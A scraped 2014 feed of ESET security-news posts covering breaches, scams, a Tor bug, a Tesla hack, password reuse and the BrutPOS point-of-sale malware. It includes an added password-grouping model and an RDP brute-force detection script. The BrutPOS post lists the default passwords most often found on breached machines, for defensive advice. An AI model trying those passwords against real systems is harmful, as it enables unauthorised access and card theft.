We Live Security – News, Views, and Insight from the ESET Security Community (http://www.welivesecurity.com), feed generated Mon, 28 Jul 2014 09:29:57 +0000

Identity fraud: How one email wiped out $300m – and sender walked free
http://www.welivesecurity.com/2014/07/28/identity-fraud-anz-email-activist/ – Mon, 28 Jul 2014 09:29:57 +0000

The post Identity fraud: How one email wiped out $300m – and sender walked free appeared first on We Live Security.

A single email wiped $300 million off the value of an Australian mining company, after an environmental activist, Jonathan Moylan, created a “corporate email” address, used identity fraud to impersonate a press officer, and sent a press release to media organizations which suggested the company faced severe financial difficulties.

The Guardian reports that the activist sent an email from the address “media@anzcorporate.com” and used ANZ logos to make his fiction more convincing. He also had access to a group of media outlet contacts, which he used to perpetrate his scam.

The release, which used the name of ANZ’s serving press officer, with a phone number directed to Moylan, was picked up by media outlets. During trading thereafter, $300m was wiped off the mining company’s value.

Cybercriminal gangs use similar identity fraud tactics (as reported by We Live Security here) – aiming scam emails at contacts relating to news stories, in the name of real companies, in the hope of earning money. Moylan’s lack of financial motive was a key factor in his suspended sentence, the judge said.

This summer, a similar tactic was employed against a leaked list of people who had enquired about the auction of Bitcoins from the “dark market” Silk Road. The list provided a target for phishing scammers – and at least one site fell for the scam emails.

Identity fraud – a potent weapon for cybercrime

A reported 100 Bitcoins ($63,300) were stolen from Bitcoin Reserve via a fake login page which harvested email credentials, according to TechCrunch’s report.

Coindesk reports that the scam targeted individuals on a list of people who had expressed interest in the auction for Bitcoins from Silk Road. The list was leaked after a member of the U.S. Marshals service used CC instead of BCC on an email.

‘Not a criminal in the classic sense’

The Register reports that the country’s supreme court gave Moylan a suspended sentence, saying that despite the fact that “Some investors lost money,” the activist was “not a criminal in the classic sense.”

The attack came in the form of a release claiming that ANZ Bank had withdrawn a loan from the mining company, totalling $1.2bn, relating to an open-cut coal mine. Moylan added that the bank was withdrawing due to “corporate responsibility,” according to The Register.

Justice Davies said, “It is clear the offender has been prepared to break the law on a number of occasions to further the causes which he believes in.”

Sony hacked: Victims to get $15m in ‘quality’ games – some day
http://www.welivesecurity.com/2014/07/28/sony-hacked-victims-offered-games/ – Mon, 28 Jul 2014 09:14:26 +0000

Victims of the notorious attack against Sony’s online gaming service and associated websites in 2011, which exposed details for up to 77 million subscribers, are to be offered $15m in digital goods as compensation for the outage and exposure of data, according to Polygon.

Victims will be offered a list of PS3 and PSP games including hits such as Dead Nation, InFamous and LittleBigPlanet, or a three-month free subscription to the premium PlayStation Plus service. The Plus subscription will only be available to U.S. gamers.

The offer is still subject to approval by a judge in May 2015. “Boy won’t those games look appealing then,” commented Eurogamer referring to the vintage of the titles, none of which are very new. The site suggested that Sony’s legal letter was best enjoyed read out in the voice of crooked lawyer Saul Goodman from Breaking Bad.

Sony hacked – too little, too late?

A previous judgement by Britain’s Information Commissioner’s Office fined Sony, and said that the attack, “could have been prevented if software was up to date,” according to ZDNet’s report.

The class-action suit was brought immediately in the wake of the hack, which exposed personally identifying details for 77 million users, at that point among the biggest breaches in history. It also took several months before Sony’s PSN service was working fully in all territories.

“A proposed settlement has been reached in the class action lawsuits arising from the April 2011 criminal cyber-attacks on the PlayStation Network, Qriocity, and Sony Online Entertainment services,” Sony told gaming site Polygon via email. “While we continue to deny the allegations in the class action lawsuits, most of which had been previously dismissed by the trial court, we decided to move forward with a settlement to avoid the costs associated with lengthy litigation.”

Sony – “We continue to deny the allegations”

Sony claims there has been no evidence of credit card fraud as a result of the attack, and offers a cash settlement to anyone who can prove they have suffered financial damage.

The games are also on offer on a first-come, first-served basis – once $6 million have been handed out, the rest of the settlement will be in the form of subscriptions.

Cloud security – fears as zombie army finds gold in heavens
http://www.welivesecurity.com/2014/07/26/cloud-security/ – Sat, 26 Jul 2014 20:48:08 +0000

Cloud computing services are commonly used in cyberattacks, often to host a malicious payload which a victim is duped into clicking and downloading malware. But two researchers have shown that the cloud can harbour something even more alarming for cloud security – “legal zombies”, ready to rob the internet of gold.

Using free cloud application hosting can allow an attacker to create a “free supercomputer”, according to The Register’s report. Researcher Oscar Salazar warns that such a resource can be used to mine cryptocurrency but is also capable of mounting direct attacks – and he predicts cybercriminals will soon use this method, according to Tech Week Europe.

Salazar’s attack relies on application-hosting services – many of which have highly lax sign-up procedures, Wired reported. Armed with a self-made list of fake email addresses, he was able to create a host of accounts in the cloud, despite cloud security measures.

Within days the two researchers had legally created an army of 1,000 non-existent “customers” on sites offering cloud application services – and used this horde to mine cryptocurrency. At full power, the botnet earned $1,750 a week “on someone else’s electricity bill”, Ragan said.

Cloud security – undead allowed in, no questions asked

“We essentially built a supercomputer for free,” Ragan said. He, along with Salazar, works as a researcher for the security consultancy Bishop Fox. “We’re definitely going to see more malicious activity coming out of these services.”

Salazar and Ragan declined to reveal which of the 150 companies they tested allowed them entry – to prevent hackers following in their footsteps – but said that in some cases, the mining process was allowed to continue for weeks.

“What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service.”

No CAPTCHAS, no questions – is this cloud security?

“A lot of these companies are startups trying to get as many users as quickly as possible,” says Salazar. “They’re not really thinking about defending against these kinds of attacks.”

Worryingly, some of these companies use cloud services resold from Amazon – which may make mitigating certain forms of cyberattack more difficult.

“Imagine a distributed denial-of-service attack where the incoming IP addresses are all from Google and Amazon,” Ragan said. “That becomes a challenge. You can’t blacklist that whole IP range.”

The Register reports that the researchers admit that the technique ‘violates’ a lot of terms-of-service – and hence, the bots were culled mercilessly after the experiment.

Data breach – European bank’s info “held to ransom”
http://www.welivesecurity.com/2014/07/25/data-breach-european-banks-info-held-ransom/ – Fri, 25 Jul 2014 15:53:07 +0000

The European Central Bank has revealed that information including email addresses and contact data has leaked in a data breach – and that the unknown attackers demanded “financial compensation” from the bank in return for not releasing the information.

The BBC reports that records for 20,000 people leaked in the breach, which affected a database serving its website. The ECB released a statement pointing out that the database was separate from internal systems, and that “no market-sensitive data was compromised.”

“The theft came to light after an anonymous email was sent to the ECB seeking financial compensation for the data,” the bank said. The data came from people who had applied to attend ECB events via the site, and those affected have been notified.

The use of data theft as a tool for extortion is a potent weapon for cybercriminals. In some cases, blackmailers have carried out threats – and put companies out of business.

Veteran security researcher and We Live Security writer Graham Cluley says, “In the last few weeks there have been numerous stories of online criminals launching attacks against businesses with the aim of extorting money from their victims.”

Data breach – are you affected by bank leak?

As an extra precaution, all passwords on the site have been reset. Police in Germany have been informed and are investigating.

Silicon Republic reports that it is believed that the European regulator did not pay the (undisclosed) ransom.

The site reports that the attack follows a pattern of similar moves against poorly protected databases at international financial institutions, and DDoS attacks directed against bank sites.

New era of data breach extortion

It has also been revealed that mobile phone giant Nokia had, a few years back, found itself in the uncomfortable position of handing over millions of dollars to blackmailing hackers who had stolen encryption codes for the Symbian operating system, and were threatening to post them online.

Data breaches can cause a loss of confidence among consumers, and cause lasting damage not only to a brand, but to profit. Marketing Week reports that Target – the subject of a large-scale data breach affecting millions of Americans – saw profits down 46% year-on-year in the last quarter. The breach led to the departure of the company’s CEO and CIO, and a restructuring of the company’s command structure.

“While most of the data were encrypted, parts of the database included email addresses, some street addresses and phone numbers that were not encrypted,” the ECB said. The affected database “is physically separate from any internal ECB systems,” the bank said.

How to avoid tech support scams
http://www.welivesecurity.com/videos/avoid-tech-support-scams/ – Fri, 25 Jul 2014 14:53:03 +0000

Tech support scams come in many different forms and can be hard to detect. Following these simple steps from We Live Security will help you recognise and avoid them.

How to get rid of posts and photos you hate on Facebook
http://www.welivesecurity.com/videos/get-rid-posts-photos-hate-facebook/ – Thu, 24 Jul 2014 15:09:20 +0000

Almost everyone now has a Facebook account where posts and photos are frequently shared. However, keeping track of what is posted can sometimes be a problem. Follow these 5 simple tips to get rid of content you no longer wish to share.

Accounts hacked: Stubhub $1m cyber fraud ticket scam busted
http://www.welivesecurity.com/2014/07/24/accounts-hacked/ – Thu, 24 Jul 2014 14:57:36 +0000

Ebay’s online ticket resale service Stubhub fell victim to a cyber-scam where a “global gang” used 1,600 hacked accounts on the service and bought and resold tickets, laundering the profits through European banks – earning a total of $1m.

Three of the criminals behind the spate of hacked Stubhub accounts were arrested in New York, and a further three in London, according to the BBC’s report.

The scams were complex, involving data from other corporate breaches (such as email addresses and passwords) which were then used to breach legitimate Stubhub accounts – eBay emphasised that its servers had not been accessed, after a high-profile attack earlier this year reportedly exposed customer data.

Accounts hacked – ‘no data breach’

The criminals – described by New York County’s district attorney as a “global cybercrime ring” – also used malware to obtain Stubhub logins.

Stubhub’s global head of communications, Glenn Lehrman, said in an interview with Reuters that victims have been reimbursed, and that the firm has been working with law enforcement around the world for more than a year.

Lehrman said, via Sky News’ report, “We did not have anyone who hacked into our system” and described a “pretty intense network of cyber fraudsters working in concert with one another.”

“The arrests today relate to fraudulent transactions that were detected on existing Stubhub customer accounts in 2013,” said spokesman Glenn Lehrman.

Passwords from previous data breaches

“These legitimate customer accounts were accessed by cybercriminals who had obtained the customers’ login and password either through data breaches of other websites and retailers, or through the use of key-loggers and/or other malware on the customer’s own PC.

“Once fraudulent transactions were detected on a given account, customers were immediately contacted by Stubhub’s trust and safety team, who refunded any unauthorised transactions.”

Money was laundered through UK bank accounts from the hacked Stubhub accounts, Lehrman said, according to SC Magazine’s report.

The use of credentials stolen in data breaches highlights the importance of changing your details if you suspect your password and username may have leaked in such an attack. An ESET guide to what to do in this event can be found here.

Online privacy fears as Tor rushes to fix “uncloaking” bug
http://www.welivesecurity.com/2014/07/24/online-privacy-2/ – Thu, 24 Jul 2014 14:44:32 +0000

The developers of the Tor online privacy service are fixing a weakness which could have exposed the identities of hundreds of thousands of users of sites around the world – potentially putting lives at risk, as political activists in oppressive regimes rely on the online privacy service to make communications hard to trace.

The hack was due to be exposed at the Black Hat security conference in Las Vegas – but the talk was abruptly cancelled due to legal concerns.

The talk, entitled “You Don’t Have to be the NSA to Break Tor”, aimed to showcase a technique which could “uncloak” users of the anonymizing web service for less than $3,000.

The details of the method have not been disclosed, and the Tor Project has moved rapidly to fix the bug.

Online privacy – Tor users fear ‘uncloaking’

Black Hat said via a post on its official website, “One of our selected talks, ‘You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget’ by CERT/Carnegie Mellon researcher Alexander Volynkin was scheduled for a Briefing at Black Hat USA this August in Las Vegas.”

“Late last week, we were informed by the legal counsel for the Software Engineering Institute (SEI) and Carnegie Mellon University that: ‘Unfortunately, Mr. Volynkin will not be able to speak at the conference since the materials that he would be speaking about have not yet been approved by CMU/SEI for public release.’ As a result, we have removed the Briefing from our schedule.”

‘Questions’ for researchers behind hack

The Tor Project said that it had not forced the cancellation of the talk – but that it had “some questions” for the researchers.

Roger Dingledine said via a post on the Tor forums that, “I think I have a handle on what they did,” reassuring users that a fix for the bug was imminent.

Using the free Tor browser, you can access special .onion sites – only accessible using the browser – which are used by political activists worldwide to post information untraceably.

Other Tor sites openly host highly illegal content including pirated IP, drug markets, child pornography and sites where credit card details are bought and sold.

Tor Project leader Roger Dingledine said, “Based on our current plans, we’ll be putting out a fix that relays can apply that should close the particular bug they found. The bug is a nice bug, but it isn’t the end of the world. And of course these things are never as simple as ‘close that one bug and you’re 100% safe’.”

World of Warcraft account hacked – should thieves face jail?
http://www.welivesecurity.com/2014/07/24/world-of-warcraft-account-hacked/ – Thu, 24 Jul 2014 14:40:24 +0000

Account hackers and thieves who loot magic weapons, armor and hard-won game currency from players in massively multiplayer titles such as World of Warcraft should face the same sentences as real-world thieves, a politician has suggested.

The British Member of Parliament Mike Weatherley, chief advisor to Prime Minister David Cameron on intellectual property, suggests that crimes involving virtual items with real-world monetary value should be treated in the same way as offline thefts, according to a report in The Independent.

Thieves who steal virtual items in online games – for example by hacking a World of Warcraft account – should receive the same sentences as ‘real-life’ thieves, the MP suggested, according to an interview with radio station NewsTalk.

World of Warcraft account hacked?

Weatherley is a player of the popular fantasy game – which is a constant target for cyber criminals due to its large player base and the correspondingly high value of in-game items. Situations where gamers find their World of Warcraft account hacked are common, and cybercriminals even launder money via in-game auctions.

Speaking to Buzzfeed, the MP said that authorities should not waste time over small-scale thefts.

“It’s a scale thing as well,” he said. “If you’re a genuine hacker, so to speak, and you’ve stolen the money out of thousands of accounts, then I think that’s a general theft problem that needs to be addressed very seriously.”

Such items are commonly stolen by hackers targeting player accounts – either with malware or phishing attacks. Once an account is compromised, criminals sell items for game currency, which can be exchanged for real money on various specialist sites.

A We Live Security guide to common scams which can lead to account theft in online games outlines some of the risks online gamers face.

Most online games include mechanisms to prevent direct theft – but crimes perpetrated via malware or phishing are often punished by game companies, rather than law enforcement, via penalties such as bans, account suspension or the deletion of large amounts of game currency.

“If you’ve spent £500 on building up your armed forces and someone takes them away online, I guess you can feel hard done-by and you want your £500 back,” Weatherley said. “People shouldn’t be doing it.”

“The perception from some people is if you steal online it’s less of a crime than if you steal physically. If it genuinely is someone who’s paid in the game and they’ve had that stolen, that’s probably no different to something in the physical world.”

Mike Penning, the Minister of State for Justice, responded that sentencing in such cases was “a matter for the courts.”

Tesla Model S hacked to open doors while in motion
http://www.welivesecurity.com/2014/07/23/tesla-model-s-hacked-open-doors-motion/ – Wed, 23 Jul 2014 14:22:42 +0000

Tesla’s Model S has been hacked to make the doors and sun roof open while the car is in motion – and the researchers behind the attack were also able to switch on the headlights and sound the horn by remote control, according to Ubergizmo’s report.

The hack, performed by Zhejiang University students as part of a competition, exploited an unspecified flaw in the flow design of the car to gain control of systems including the door locks, windscreen wipers and lighting via the car’s central control system.

Tesla did not officially support the competition, but welcomed the publication of the exploit and said it would investigate. While security researchers have previously demonstrated successful attacks against various models of ‘connected’ vehicles, wireless attacks which work while the vehicle is in motion are rare.

Tesla Model S – hacker target

The car – a high-profile ‘flagship’ for the electric sportscar market – has been the focus of much security research, due to its integration of computer components (the dashboard includes a connected touch panel), and reliance on apps for functions such as opening the doors. This week’s hack is the first to compromise multiple systems remotely – although the researchers have not as yet revealed their methodology.

The team won a reported prize of $10,000 for the hack, offered as part of the annual Syscan conference in Beijing, according to The Register’s report.

Teams were challenged to compromise the 17-inch touch panel which forms the centrepiece of the Model S’s dashboard, according to Autoblog’s report. The hack had to be carried out remotely, according to the rules of the contest. The car maintains a connection to the internet via syncing with the driver’s mobile device.

In a statement, the electric car company said that it was in favour of “the idea of providing an environment in which responsible security researchers can help identify potential vulnerabilities.”

This week’s hack follows previous exploits which could allow potential attackers to bypass locking systems on the car’s paired app.

Earlier this year, security questions were raised over the app-based “key” used to unlock the electric supercar Tesla – after a researcher showed it was possible to guess the key’s six-digit PIN by brute force. The Tesla car is “locked” using an iPhone app, accessed via a basic six-character password, according to Sky News.

Tesla Model S – dawn of ‘cyberjacking’?

As wireless technologies and electronic controls are increasingly built into cars, vehicles could become vulnerable to hackers – either stealing information, or injecting malware, a U.S. Senator warned in a letter to 20 major auto manufacturers last year.

Senator Edward J. Markey, Democrat, Massachusetts, pointed out in his publicly available letter that average cars now have up to 50 electronic control units, often controlled by a car “network”.

The open letter has ignited a spate of commentary, with Market Oracle describing the crime as “cyberjacking”, and pointing out that the average family car contains 100 million lines of computer code, and that software can account for up to 40% of the cost of the vehicle, according to researchers at the University of Wisconsin-Madison.

Hacks against cars have been demonstrated before – but thus far, have relied on attackers having physical access to the vehicles. At the DefCon conference in 2013, two researchers showed how they could seize control of two car models from Toyota and Ford by plugging a laptop into a port usually used for diagnostics, as reported by We Live Security here.

This week’s hack against Tesla’s flagship could mark a new stage in “cyberjacking” – where attackers could compromise a vehicle remotely, without first accessing the car’s hardware.

Shaggy Dogma: Passwords and Social Over-Engineering
http://www.welivesecurity.com/2014/07/23/shaggy-dogma-passwords-social-engineering/ – Wed, 23 Jul 2014 05:00:53 +0000

Given the ‘nightmare’ that is password management, is Microsoft right to say that it’s sometimes OK to re-use the same memorable password on several sites?

Recently I presented at the CFET (Cybercrime Forensics Education & Training) conference in Canterbury, in the UK, on password and PIN selection strategies, an ongoing research interest. To be more precise, on this occasion I was talking about re-evaluating the way we educate computer users about good password/passphrase/passcode selection practice. (I’m afraid there wasn’t a paper to go with the presentation, but there’s a very PIN-oriented paper I presented at EICAR a couple of years ago here: PIN Holes: Passcode Selection Strategies.) (I’ll probably return to the whole education and strategy issue on the ESET blog in the near future, but right now I want to look at a very specific issue.)

Hardly had I left Canterbury before my attention was directed to a paper by Dinei Florêncio and Cormac Herley of Microsoft Research and Paul C. van Oorschot of Carleton University, Ottawa, which, according to The Register ‘shot holes through the security dogma’: namely, a paper called Password portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts.

So what was this shaggy dogma story? Well, let’s go back to an extract from that presentation.

Fernando Corbato, the MIT computer scientist who is widely credited with pioneering the use of the password as a means of logging into a computer, says passwords have now become “kind of a nightmare.” Some might call that payback…

Corbato said in an interview with Wall Street Journal’s Digits Blog that he himself had around 150 passwords, and now committed security sins such as writing down a “crib sheet” to remember them all. Presumably written on the world’s biggest Post-IT, stuck onto a very large monitor.

Security researchers usually suggest that you use the strongest possible password, change it frequently (and certainly if there’s any possibility of a compromise), and don’t ever re-use the same password between two or more services. Even if you have fewer than 150 passworded accounts to maintain, it’s likely that you have a lot of strong passwords to generate, and remember, and you probably have to change at least some of them fairly regularly. But this ‘dogma’ is by no means irrational, even though there are scenarios (some of them all too common, like a server breach when the service provider drops the ball and an attacker gets access to a large credentials database) where your password is less safe than you might think or hope. Nevertheless, strong passwords/passphrases do, in the most favourable circumstances, represent a significant obstacle to easy compromise by an attacker. So is there a less onerous alternative? Well, yes and no. Password management software, for instance. But Florêncio, Herley and van Oorschot are suggesting something that sounds at first a little more radical.

They have presented a dense and detailed paper, well worth reading if you’re interested in the minutiae of authentication (and it covers more issues than I’ve mentioned here). Indeed, if it had been available when I compiled my presentation, I’d certainly have made reference to it. But for the everyday user, it offers one simple and possibly useful idea, based on the assumption that some authenticated services are more important (or carry more risk) than others. Indeed, I don’t know about you, but I often find myself having to generate a username/password pair for a service I may never use again, and where authentication may actually be overkill in any case. At least from my point of view: however (for instance), a publisher might want to track who accesses a particular document by requiring each person to create an account. (And in fact that’s a common enough scenario for a professional researcher.)

The paper concludes:

We have explored the task of managing a portfolio of passwords. A starting point for our analysis was the critical observation that to be realistic, efficient password management should consider a realistic suite of attacks and minimize the sum of expected loss and user effort…

… optimal grouping will put high-value accounts in smaller (or singleton) groups, and low-value accounts in larger groups.

They don’t say, as you might think from some reports, that strong passwords and non-reuse of passwords across accounts are always overkill. They do, however, seem to suggest that grouping accounts according to value (think in terms not only of value to you, but to a potential attacker) means that some accounts don’t require the same degree of authentication as others. For instance, you might have a standard memorable password that you might use across less important services. And in fact, I suspect that this isn’t an uncommon strategy. It isn’t one that finds its way into security gurus’ recommendations, however. Perhaps because it’s not always easy to define what constitutes low-value to an attacker (let alone an end user), and therefore to provide hard and fast rules about how to assign sites/credentials to groups. The abstract does offer:

… an optimal password re-use strategy in the following sense: for a fixed number of passwords, and a given set of accounts (thus effort is fixed), find how to group accounts to minimize total expected loss.

Sadly, that solution is presented in abstract terms that probably do not help much if you’re wondering whether to generate a password with optimal entropy for a given site, especially if you don’t know what password entropy actually is. (Simplistically, it’s a way of measuring how easy to predict a password is: in this sense, predictability might imply susceptibility to a variety of attacks – it’s more complex than a simple measure of randomness.)

This is not a trivial issue: if you’re prepared to accept that low value is the same as low risk and you don’t care whether your credentials for service n are compromised – even if that means that your credentials for x, y and z may also be compromised because they use the same password – you’d better be sure that

  1. those really are low-value, low-risk services
  2. there aren’t any high-value, high-risk services that might be at risk of secondary compromise. (For instance, when knowing your shared password might make it easier for an attacker to guess the high value service password even though you don’t use the identical password on the high value service.)

For a security specialist, it’s easier to suggest that – despite the inconvenience – you treat every service as high value (i.e. advise never to share), rather than try to define exactly how to group the passworded services you use and provide a lengthy explanation that covers all the edge cases with no possibility of misinterpretation. I can certainly envisage scenarios where services may be regarded as low risk and low value but the shared password might offer a clue as to what strategy was used by the same user on a higher value service.
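As an added illustration of the grouping argument above (not the paper's own model or code), the toy model below makes the trade-off concrete: for a fixed number of distinct passwords, which accounts should share one? The account names, values and per-site leak probabilities are constructed assumptions, and the loss function is the simplification that a leak at any site in a group exposes every account in that group.

```python
"""Toy 'password portfolio' model: an added illustration, not the
Florencio/Herley/van Oorschot model or code. Accounts, values and leak
probabilities below are constructed assumptions."""
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed portfolio: name -> (loss if the account is compromised,
# probability per year that the site itself leaks your credentials).
ACCOUNTS: Dict[str, Tuple[float, float]] = {
    "bank":      (10000.0, 0.01),
    "email":     (5000.0, 0.02),
    "shop":      (300.0, 0.05),
    "forum":     (20.0, 0.20),
    "newspaper": (10.0, 0.15),
    "webinar":   (5.0, 0.25),
}


def group_loss(group: List[str], accounts=ACCOUNTS) -> float:
    """Expected loss of one group of accounts sharing a single password.
    Assumption: a leak at any site in the group exposes the shared password,
    so every account in the group is lost (the secondary compromise above)."""
    p_no_leak = 1.0
    total_value = 0.0
    for name in group:
        value, p_leak = accounts[name]
        p_no_leak *= 1.0 - p_leak
        total_value += value
    return (1.0 - p_no_leak) * total_value


def portfolio_loss(grouping: List[List[str]], accounts=ACCOUNTS) -> float:
    """Total expected loss: groups are treated as independent, so losses add."""
    return sum(group_loss(g, accounts) for g in grouping)


def partitions(items: List[str]) -> Iterator[List[List[str]]]:
    """Enumerate every way of splitting items into groups (Bell numbers grow
    fast, so this brute force is for small portfolios only)."""
    if not items:
        yield []
        return
    first, rest = items[0], items[1:]
    for smaller in partitions(rest):
        yield [[first]] + smaller                      # first gets its own password
        for i, g in enumerate(smaller):                # or shares one with group i
            yield smaller[:i] + [[first] + g] + smaller[i + 1:]


def best_grouping(n_passwords: int, accounts=ACCOUNTS) -> Optional[Tuple[float, List[List[str]]]]:
    """Fixed effort (exactly n_passwords distinct passwords): return the
    lowest expected loss and the grouping of accounts that achieves it."""
    names = sorted(accounts)
    best: Optional[Tuple[float, List[List[str]]]] = None
    for grouping in partitions(names):
        if len(grouping) != n_passwords:
            continue
        loss = portfolio_loss(grouping, accounts)
        if best is None or loss < best[0]:
            best = (loss, sorted(sorted(g) for g in grouping))
    return best


if __name__ == "__main__":
    # With this portfolio, the optimum always isolates the bank account and
    # lumps the throwaway accounts together, as the paper's conclusion predicts.
    for k in range(1, len(ACCOUNTS) + 1):
        loss, grouping = best_grouping(k)
        print(f"{k} password(s): expected loss {loss:8.2f}  groups {grouping}")
```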

Unfortunately, over-engineering is one of the ongoing problems with security education generally. And one of the reasons for that is that – as always – you can’t rely on every end user to interpret everything you say correctly, even if you express it as you intended.

David Harley
ESET Senior Research Fellow

Is your Point of Sale machine protected against attacks?
http://www.welivesecurity.com/2014/07/22/point-sale-machine-protected-attacks/
Tue, 22 Jul 2014 21:07:10 +0000

Criminals are very interested in retailers’ Point of Sale (PoS) machines. Recently, a new type of malware has been found that specifically tries to break into PoS machines, called Win32/BrutPOS.A.

In case the coverage of last year’s Target breach did not drive this point home: Criminals are very interested in retailers’ Point of Sale (PoS) machines. Because so many credit card numbers pass through these systems, and they are often insufficiently guarded, criminals find them a very low-hanging fruit for theft. Recently, a new type of malware has been found that specifically tries to break into PoS machines. ESET detects this threat as Win32/BrutPOS.A.

The idea behind BrutPOS is that it tries to brute-force its way into PoS machines by trying a variety of (overused) passwords in order to log in via Remote Desktop Protocol (RDP). It is unclear at this time how this malware is being spread, but it is likely just one component of an attacker’s toolkit – that is to say, it is probably being used in concert with other malware, possibly depending on the defenses (or lack thereof) on the machines being attacked. Once the machine has been breached, the trojan installs a “RAM Scraper” which collects credit card numbers from the memory of the PoS machine and sends them back to the attackers via FTP. Many of the systems on which this malware has been found belong to small businesses, which are particularly desirable targets for such theft.

If you have a PoS machine, there are a few quick things you can do to help protect these systems from this particular type of attack:

  • Use a strong password
    Much has been written on the importance (and tactics) of choosing a strong password, and yet here we have malware that is successfully breaching machines because they have such poor passwords. It is important to note that in this case, many of the passwords used on the breached machines were the default passwords or were simple variations on the name of the PoS vendor. For instance: the top three most common passwords were “aloha12345”, “micros” and “pos12345”. It is best to use a passphrase rather than a simple password, as a passphrase can be easy to remember yet very time-consuming to crack due to its length.
  • Limit login attempts
    Once you have a strong password in place, make it count: Limit attempts to log in to machines to just a few. Locking people out after 3-5 incorrect attempts is a common range. This will dramatically decrease the effectiveness of brute-force attacks, as the attackers will be prevented from trying large numbers of incorrect passwords until they get to the right one.
  • Limit access
    We talk a lot here about the Principle of Least Privilege and the dangers of enabling RDP. This is far from being the first malware to take advantage of poor passwords or of the power of RDP. The long and short of it is, limit access wherever you can. For instance: If you do not need to remotely access the machine, do not enable RDP. If you do need to enable RDP, make sure you do so securely. This article from University of California Berkeley has some great tips to help. Likewise, limiting FTP access may hamper attackers’ ability to exfiltrate credit card data.
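The lockout and RDP advice above can also be checked from the other side: the detector below, an added example that is not ESET's detection or anything from BrutPOS, flags a source that racks up a burst of failed RDP logons and, more importantly, a later success from that same source. The log lines are constructed, simplified renderings of Windows Security events (4625 failed logon, 4624 successful logon, logon type 10 for RDP); real events are evtx/XML.

```python
"""RDP brute-force detector over logon events: an added example, not ESET's
detection or BrutPOS code. The line format is a constructed, simplified
rendering of Windows Security events (4625 = failed logon, 4624 = successful
logon, logon type 10 = RemoteInteractive, i.e. RDP); real events are evtx/XML."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RDP_LOGON_TYPE = 10

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>4624|4625) logon_type=(?P<ltype>\d+) "
    r"src=(?P<src>\S+) user=(?P<user>\S+)$"
)

# Constructed sample: 198.51.100.23 hammers two accounts and finally gets in;
# 203.0.113.9 is a staff member who mistyped once; the logon_type=2 line is a
# console logon and is out of scope for an RDP rule.
SAMPLE_LOG = """\
2014-07-22T20:58:01Z 4625 logon_type=10 src=198.51.100.23 user=Administrator
2014-07-22T20:58:03Z 4625 logon_type=10 src=198.51.100.23 user=Administrator
2014-07-22T20:58:05Z 4625 logon_type=10 src=203.0.113.9 user=manager
2014-07-22T20:58:06Z 4625 logon_type=10 src=198.51.100.23 user=Administrator
2014-07-22T20:58:09Z 4625 logon_type=10 src=198.51.100.23 user=pos
2014-07-22T20:58:11Z 4624 logon_type=10 src=203.0.113.9 user=manager
2014-07-22T20:58:12Z 4625 logon_type=10 src=198.51.100.23 user=pos
2014-07-22T20:58:15Z 4625 logon_type=2 src=127.0.0.1 user=cashier
2014-07-22T20:58:16Z 4625 logon_type=10 src=198.51.100.23 user=pos
2014-07-22T20:58:20Z 4625 logon_type=10 src=198.51.100.23 user=pos
2014-07-22T20:58:24Z 4624 logon_type=10 src=198.51.100.23 user=pos
"""

Event = Tuple[datetime, str, int, str, str]


def parse(log_text: str) -> List[Event]:
    """Parse lines into (timestamp, event_id, logon_type, source, user),
    sorted by time; lines that do not match the format are ignored."""
    events: List[Event] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["event"], int(m["ltype"]), m["src"], m["user"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_rdp_bruteforce(events: List[Event], threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Sliding-window rule: `threshold` RDP failures from one source within
    `window` raise a 'bruteforce' alert (the lockout tip above caps attempts
    at 3-5); a later RDP success from a flagged source raises
    'bruteforce_success', the case where the password was eventually guessed."""
    recent: Dict[str, deque] = defaultdict(deque)   # src -> failure timestamps in window
    tried: Dict[str, set] = defaultdict(set)        # src -> user names attempted
    flagged: Dict[str, dict] = {}                   # src -> its open bruteforce alert
    alerts: List[dict] = []
    for ts, event, ltype, src, user in events:
        if ltype != RDP_LOGON_TYPE:
            continue
        if event == "4625":
            tried[src].add(user)
            q = recent[src]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if src in flagged:
                flagged[src]["failures"] += 1       # keep counting after the alert
            elif len(q) >= threshold:
                alert = {"type": "bruteforce", "src": src,
                         "first_seen": q[0], "failures": len(q)}
                flagged[src] = alert
                alerts.append(alert)
        elif event == "4624" and src in flagged:
            alerts.append({"type": "bruteforce_success", "src": src, "user": user,
                           "at": ts, "failures_before_success": flagged[src]["failures"],
                           "users_tried": sorted(tried[src])})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse(SAMPLE_LOG)):
        print(alert)
```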

There are a variety of other things you can do to help protect your PoS machines, which are much the same measures as you would take to protect any other machine on the Internet, including regularly updating software and using security software. This post by the US-CERT goes into more detail, specific to administering PoS systems.

This is a good reminder that any machine that connects to the Internet can and should be protected, and that the techniques for doing so are basically the same, regardless of operating system. Once you learn good security hygiene, you can use the same basic principles on any system you administer.
Wi-Fi security – the new ‘bulletproof’ router (and how to toughen yours)
http://www.welivesecurity.com/2014/07/22/wi-fi-security-2/
Tue, 22 Jul 2014 16:45:36 +0000

A new project aims to protect homes and small businesses from the security failings of Wi-Fi routers, a problem which has repeatedly hit the headlines over the past year.

A new project aims to protect homes and small businesses from the security failings of Wi-Fi routers, a problem which has repeatedly hit the headlines over the past year as security researchers and law enforcement warn of the Wi-Fi security problems posed by the devices – and by shared Wi-Fi networks in general.

The Open Wireless Router project, launched by the Electronic Frontier Foundation, aims to develop software which offers a higher level of Wi-Fi security than current router models - and also offer a safe way for users to share their networks with guests.

The firmware is not ready for use by home users, the EFF warns, and is aimed at “people prepared to deal with the bleeding edge.”

Wi-Fi security – a new solution?

The Inquirer reports that the organization has released source code for a secure, open router firmware, running on a popular Netgear model – and asked for help from the hacker and security researcher community.

“The software aims to do several things that existing routers don’t do well—or don’t do at all,” the organization says.

